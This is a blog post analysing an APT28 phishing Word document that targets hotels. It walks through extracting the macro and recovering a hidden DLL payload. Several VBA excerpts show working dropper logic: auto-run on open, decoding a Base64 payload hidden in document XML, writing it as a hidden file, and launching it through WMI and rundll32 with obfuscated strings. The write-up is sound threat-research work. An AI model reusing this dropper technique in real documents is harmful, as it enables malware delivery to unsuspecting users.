This week, FireEye published a writeup of yet another APT28 campaign, this time targeting the hospitality sector:
I'm always interested to see the latest APT group techniques, so I decided to review the malware to see how the dropper worked (and see if there were any goodies I could add to my toolkit).
The dropper was shown to be a typical Word .docm file (MD5: 9b10685b774a783eabfecdb6119a8aa3) and opening the document we see a common style of phishing lure:
The security dialog indicates that this is likely a VBA based attack, so we turn to Didier Stevens' oledump (or Words Visual Basic editor if you prefer) to view the contents.
Listing the embedded objects, we can see the macro for us to analyse within
We extract the VBA source using the following command (The full contents of the extracted VBA can be found as a Gist at the end of this post):
oledump.py -a ./Hotel_Reservation_Form.docx -s A3 -v
Let's pick up on the interesting parts so we can understand what is going on:
Sub AutoOpen() Execute End Sub
Here we can see that it is the
Execute function called on document launch. Reviewing this function, we see VBA interacting with the document XML:
... 'extract and decode encoded file xml = ActiveDocument.WordOpenXML Set xmlParser = CreateObject("Msxml2.DOMDocument") If Not xmlParser.LoadXML(xml) Then Exit Sub End If Set currNode = xmlParser.DocumentElement Set selected = currNode.SelectNodes("//HLinks" & "/vt:" & "vector" & "/vt:" & "variant" & "/vt:" & "lpwstr") If 2 > selected.Length Then Exit Sub End If base64 = selected(1).Text bin = DecodeBase64(base64) ...
It turns out that this function is taking the XML of the Word document, and extracting a value using the XPath
//HLinks/vt:vector/vt:variant/vt:lpwstr. Once extracted, this value is then Base64 decoded... very nice!
Let's hunt for the Base64 encoded payload that is being dropped. As a .docm is basically a ZIP container of XML files, we can use
zipgrep to find the file containing the
HLinks tag with the following command:
zipgrep -i HLink ./Hotel\_Reservation\_Form.docx
Immediately we see the blob of Base64 data that we are after, and we can extract this with the following command:
unzip Hotel_Reservation_Form.docx; xpath ./docProps/app.xml '//HLinks/vt:vector/vt:variant/vt:lpwstr' > malware.bin
Cleaned up, we Base64 decode to recover the dropped payload:
cat malware.bin | base64 -D > malware.exe.bin
And using the
file output, we see that we have a PE32 executable:
./malware.exe.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Now that we have the dropped payload, we can search for the signature on VirusTotal. We immediately see one indicator of why this was attributed to APT28, with indicators showing "Sofacy" as the family of malware:
To finish up our review, let's have a look at how the dropped payload is executed. First we see that the decoded executable is written to
%APPDATA%\user.dat, and the "hidden" attribute is set on the file once written.
'save decoded file Path = Environ("APPDATA") + "\" + "user" + ".dat" FileNum = FreeFile If Dir(Path, vbHidden) <> "" Then Exit Sub End If Open Path For Binary Access Write As #FileNum Put #FileNum, 1, bin Close #FileNum SetAttr Path, vbHidden
Finally, we see how the payload is executed:
'execute saved file with WMI Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2") Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process") objProcess.Create "run" + "dll" + "32" + ".exe " + Path + ", " + "#1", Null, objConfig, intProcessID
This VBA is using WMI's
Win32_Process technique. This appears to be for AV evasion, although I'm interested in why you wouldn't just use Powershell to Base64 decode the payload in memory and avoid writing the dropped file to disk?
So there we have it, another example of Word documents being used by APT groups to deliver a payload, and a nice example of hiding EXE payloads within a HLinks section of a Word document.
Once again, thanks to the FireEye team Lindsay Smith and Ben Read for their awesome writeup.
I'm always on the lookout for further attack vectors or malware samples from APT groups. If you are willing to share, feel free to reach out via the usual methods.
And I'll leave you with the extracted VBA to admire :)